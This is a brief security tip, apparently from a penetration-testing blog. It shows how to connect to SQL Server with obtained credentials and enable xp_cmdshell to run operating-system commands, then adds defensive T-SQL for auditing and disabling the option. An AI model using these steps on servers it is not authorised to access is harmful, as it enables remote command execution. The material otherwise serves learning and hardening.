Tips & Tricks

Enabling XP_CMDSHELL in SQL Server

If you ever get access to SQL Server credentials, you may be able to use a command-line tool to connect to the server and execute system commands via “XP_CMDSHELL”. However, this feature is not always enabled by default.

We’ll start by connecting to our target with the following command.

sqsh -S <ipAddress> -U <user> -P <password>

And then we’ll run the following commands to enable XP_CMDSHELL.

EXEC SP_CONFIGURE 'show advanced options', 1
reconfigure
go

EXEC SP_CONFIGURE 'xp_cmdshell', 1
reconfigure
go

At this point, we should be able to execute our commands.

xp_cmdshell '<command>'
go
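
From the defender's side, the same two options can be audited and switched back off. The T-SQL below is an added example, not part of the original post. It assumes a session with ALTER SETTINGS (sysadmin or serveradmin) and uses only built-in catalog views and procedures.

```sql
-- 1. Current state of the two options toggled above.
--    "configured" is the stored value; "running" is what the engine uses
--    after RECONFIGURE. A mismatch means a change is staged but not applied.
SELECT name,
       CAST(value AS int)        AS configured,
       CAST(value_in_use AS int) AS running
FROM sys.configurations
WHERE name IN (N'show advanced options', N'xp_cmdshell');

-- 2. Who can flip these options: members of sysadmin and serveradmin ...
SELECT r.name AS role_name, m.name AS member_name,
       m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN (N'sysadmin', N'serveradmin');

--    ... plus any principal granted the permission directly.
SELECT p.name, sp.permission_name, sp.state_desc
FROM sys.server_permissions AS sp
JOIN sys.server_principals AS p ON p.principal_id = sp.grantee_principal_id
WHERE sp.permission_name IN (N'ALTER SETTINGS', N'CONTROL SERVER');

-- 3. Evidence of past changes: each sp_configure call writes a
--    "Configuration option '...' changed from X to Y" line to the error log.
--    Arguments: log number (0 = current), log type (1 = SQL Server),
--    then two search strings that must both match.
EXEC sp_readerrorlog 0, 1, N'Configuration option', N'xp_cmdshell';
GO

-- 4. Turn it back off. xp_cmdshell is an advanced option, so
--    'show advanced options' must be 1 while it is changed; otherwise
--    sp_configure reports that the option does not exist.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC sp_configure 'show advanced options', 0;
RECONFIGURE;
GO
```

Logins that only run application queries need neither role from step 2; removing that membership is what prevents the option from being re-enabled with stolen credentials.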